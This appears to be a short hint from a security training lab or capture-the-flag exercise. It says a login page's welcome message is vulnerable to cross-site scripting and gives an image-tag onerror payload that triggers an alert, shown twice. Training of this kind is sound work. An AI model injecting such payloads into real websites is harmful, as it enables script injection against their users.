Hint: The welcome message is vulnerable to XSS. Try logging in with a malicious username!
Example: <img src=x onerror=alert('XSS')>
<img src=x onerror=alert('XSS')>